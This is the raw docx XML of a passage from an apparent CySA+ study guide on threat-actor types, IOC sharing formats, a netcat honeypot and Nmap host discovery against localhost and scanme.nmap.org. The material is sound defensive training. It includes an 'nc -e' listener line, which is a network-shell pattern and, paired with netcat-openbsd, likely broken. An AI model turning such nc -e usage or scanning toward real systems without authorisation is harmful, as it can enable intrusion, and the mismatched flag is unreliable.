          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Type Process Injection → technique T1055.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Each technique page lists:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Detection guidance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Procedure examples (Real APT groups that use it — e.g. APT29)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Data sources to monitor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is your threat-hunting hypothesis library.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Recognise threat-actor categories (CySA+ 1.4 vocab)</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Motivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Example artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>APT (nation-state)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Espionage, long-dwell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Custom tooling, supply-chain compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Organised crime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Money</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ransomware, banking trojans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hacktivist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ideology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Defacements, doxing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Script kiddie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Notoriety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Off-the-shelf tools, loud scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Insider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Various</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bulk data access, after-hours login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Supply chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Indirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trojanised dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Match an IOC to the most likely actor before you decide containment urgency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Threat-intelligence sharing formats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "203.0.113.99,malicious,c2,2026-05-13" &gt;&gt; /tmp/iocs.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo '{"indicator":"203.0.113.99","type":"ipv4-addr","tlp":"amber"}' | jq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Real-world feeds use STIX/TAXII; the indicators travel between CERT, CSIRT, ISACs, and commercial paid feeds. Free public sources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>abuse.ch (URLhaus, MalwareBazaar, ThreatFox)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AlienVault OTX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Spamhaus DROP list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CISA AIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Active defense and honeypots</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The defensive end of threat intelligence is deception. Spin up a quick fake SSH listener:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt install -y netcat-openbsd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nc -lk -p 2222 -e /bin/false &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ss -ltnp | grep 2222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>kill %1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A real honeypot (e.g. Cowrie) logs every credential the attacker types — feeding back into your IOC pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enrich an IP with WHOIS, AbuseIPDB, and reverse DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Build a one-shot SOAR enrichment script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Map observed behaviour to MITRE ATT&amp;CK techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Categorise threat actors and recognise the major sharing feeds and formats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to enrich an IP with WHOIS, AbuseIPDB, and reverse DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Topic 2: Vulnerability Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CompTIA CySA+ CS0-003 exam weighting: 30%. Hands-on Labs 11–19.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 11 — Asset Discovery with Nmap</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use Nmap as both an asset-discovery tool and a passive/active fingerprinter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will use Nmap as both an asset-discovery tool and a passive/active fingerprinter. Asset inventory is the first step of every vulnerability management program — you cannot patch what you do not know exists. This maps to CySA+ 2.1 (Asset discovery — Map scans, Device fingerprinting; Internal vs external scanning; Active vs passive).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="1232286"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_48dc89e0cb.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="1232286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Host discovery (a "map scan")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A map scan answers "what is alive on this subnet?" without a port scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -sn 127.0.0.0/29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nmap -sn -PE -PS22,80,443 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-sn — no port scan, ping sweep only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-PE — ICMP echo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-PS22,80,443 — TCP SYN ping on those ports (useful when ICMP is blocked)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Internal vs external scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run the same scan against:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Internal: 127.0.0.1 (anything in your private space)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>External: scanme.nmap.org (a host the Nmap project lets you probe)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Notice the difference: internal scans see open management ports (22, 5985, 3389), external scans usually see only web/edge services. CySA+ tests you on this distinction — vulnerability scope is very different for each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Active service / version detection (fingerprinting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
